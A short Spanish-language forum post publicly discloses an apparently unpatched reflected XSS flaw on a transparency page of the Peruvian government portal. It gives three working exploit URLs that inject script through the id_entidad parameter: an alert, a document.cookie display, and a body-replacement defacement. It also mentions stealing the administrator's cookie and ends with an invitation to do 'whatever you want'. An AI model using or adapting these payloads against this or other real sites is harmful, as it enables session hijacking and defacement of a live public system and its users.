Hola, hoy traigo un XSS en la web del gobierno de peru la vulnerabilidad ya esta reportada por mi de hace mucho pero como no hacen caso...
Bueno el tema fue que me meti en la web en busca de un fallo asi rapido y encontre un xss en el portal de transparencia solo probe XSS pero estoy seguro que puede tener otros como SQLi aunque yo no he probado ni incito a hacerlo bueno es un XSS muy simple no tiene filtros ni nada a si que permite ejecutar javascript lo que puede permitir a un atacante robar la cookie del administrado del sitio y hacer cosas malas aquí dejo un video subido por mí
y ahora unos pequeños ejemplos de lo que puedes hacer
Alert
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28%22v4char%22%29;%3C/script%3E&id_tema=34
(http://i.imgur.com/AK5niJW.png)
Cookies
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&id_tema=34
(http://i.imgur.com/NwTQYaf.png)
Body
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3E%20document.body.innerHTML%20=%20%22%3Ch1%3Ev4char%3C/h1%3E%22;%3C/script%3E&id_tema=34
(http://i.imgur.com/QrFgZcc.png)
y asi lo que quieras...